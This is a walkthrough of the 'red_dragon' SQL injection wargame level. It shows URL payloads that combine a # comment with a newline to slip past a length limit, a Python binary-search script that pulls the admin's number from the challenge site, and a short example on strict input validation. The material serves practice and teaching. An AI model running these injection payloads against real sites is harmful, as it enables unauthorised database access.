
# \[Lord Of SQLInjection] red\_dragon

<figure><img src="https://blog.kakaocdn.net/dna/mUcVy/btsNCb0N3A0/AAAAAAAAAAAAAAAAAAAAABXSXgUDV0_2ymR6J1GHUADUkT4tGxPLb3mY0jVyA307/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=Y3UmhGT0S3EVQPatak0crPMIWBo%3D" alt="" height="339" width="928"><figcaption></figcaption></figure>

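\- Approach to the problem

-> The filter on the id parameter only covers prob, \_ and ., and the single quote is not filtered.

-> There is a length limit, so a long payload will be hard to use.

-> Start from finding the no value that corresponds to admin.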

<figure><img src="https://blog.kakaocdn.net/dna/v8vhf/btsNDGL2r0X/AAAAAAAAAAAAAAAAAAAAAL9pKPUCeZTpo6tpGEV-ekNCgtV66LK-Q0LLe1elaKWO/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=XUdmxOwPHF%2FrfE%2Fe5WuvQhgRXEM%3D" alt="" height="406" width="895"><figcaption></figcaption></figure>

→ Confirm the admin account.

```
$query = "select no from prob_red_dragon where id='admin'";
```

→ The query already has the condition id=admin, so we only need to find no.

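```
[domain]?id=%27||no>10
```

→ payload : id = '' || no > 10'

Observations

\- Removing admin from the id parameter and passing a condition for finding no, joined with OR, runs into the length limit.

\- Since we do not know what number no will be, the same result keeps coming back.

\- The no parameter has no length limit, so it has to be used, but it only accepts a no value; the conditions for finding no cannot be placed in it.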

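When querying data

```
WHERE ID = ' '||ID > # AND [column] = \n
[value] # ' ;
```

→ With a line break inserted like this, the # comment only runs to the end of the line, so AND \[column] is neutralized and the query joins up as ID > \[value] ;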
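The effect of the line break, as an added example that is not part of the original write-up: it builds the interpolated query, strips `#` comments the way MySQL does (to end of line), and contrasts a permissive numeric check with a strict one. The query template, the function names and the use of Python's `int()` as a stand-in for the permissive check are assumptions.

```python
import re

# Assumed query shape, inferred from the WHERE sketch above (not the challenge source).
TEMPLATE = "select id from prob_red_dragon where id='{id}' and no={no}"

def build(id_param: str, no_param: str) -> str:
    """String-interpolated query, as the vulnerable pattern does it."""
    return TEMPLATE.format(id=id_param, no=no_param)

def effective_sql(sql: str) -> str:
    """Drop MySQL '#' comments (they run to end of line) outside quoted strings.
    Simplified: tracks single quotes only, no backslash escapes."""
    out, in_str, i = [], False, 0
    while i < len(sql):
        ch = sql[i]
        if ch == "'":
            in_str = not in_str
        elif ch == "#" and not in_str:
            while i < len(sql) and sql[i] != "\n":
                i += 1          # skip the comment body, keep the newline
            continue
        out.append(ch)
        i += 1
    return " ".join("".join(out).split())  # collapse whitespace for display

def lenient_no(value: str):
    """Stand-in for a permissive numeric check: int() tolerates surrounding whitespace."""
    try:
        int(value)
        return value            # the raw string is passed on unchanged
    except ValueError:
        return None

def strict_no(value: str):
    """Accept ASCII digits only; fullmatch rejects leading or trailing newlines."""
    return int(value) if re.fullmatch(r"[0-9]{1,18}", value) else None

# Constructed inputs mirroring the page's request: id=%27||no>%23, no=%0a1000
ID, NO = "'||no>#", "\n1000"

if __name__ == "__main__":
    print(effective_sql(build("guest", "1")))       # normal request
    print(lenient_no(NO) is not None, effective_sql(build(ID, NO)))
    print(strict_no(NO))                            # rejected by the strict check
```

Strict validation of no closes this particular path; binding both id and no as query parameters removes the interpolation that makes it possible.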

Finding the length of no

```
[domain]?id=%27||no>%23&no=%0a100000000
```

→ 10^8 < no

```
[domain]?id=%27||no>%23&no=%0a1000000000
```

→ no < 10^9

#### brute force

```
import requests

# Cookie settings
cookies = {'PHPSESSID': 'cookie value'}

# Basic settings
start = 1
end = 9223372036854775807
now = (start + end) // 2  # integer division; float division loses precision at this size
search = "<h2>Hello admin</h2>"

while True:
    # '#' (%23) comments out the rest of the line; the newline (%0a) in no ends the comment
    parameter = "?id='||no>%23&no=%0a" + str(now)

    url = "https://los.rubiya.kr/chall/red_dragon_b787de2bfe6bc3454e2391c4e7bb5de8.php" + parameter

    respond = requests.get(url=url, timeout=10, cookies=cookies)

    sstr = respond.text

    result = sstr.find(search)

    # "Hello admin" means no > now, so raise the lower bound; otherwise lower the upper bound
    if result != -1:
        start = now
    else:
        end = now

    now = (start + end) // 2

    if start + 1 == end:
        print("no : " + str(end))
        break
```

→ no = 586482014

<figure><img src="https://blog.kakaocdn.net/dna/EB8Ir/btsNB5TFfs7/AAAAAAAAAAAAAAAAAAAAAMWRqsNmY_wjpnInDQgyTu6b55mJi0nNyyUDNnakFDF7/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=wIOFK%2BMhfxR8xLM16i6PhABeRQY%3D" alt="" height="421" width="919"><figcaption></figcaption></figure>
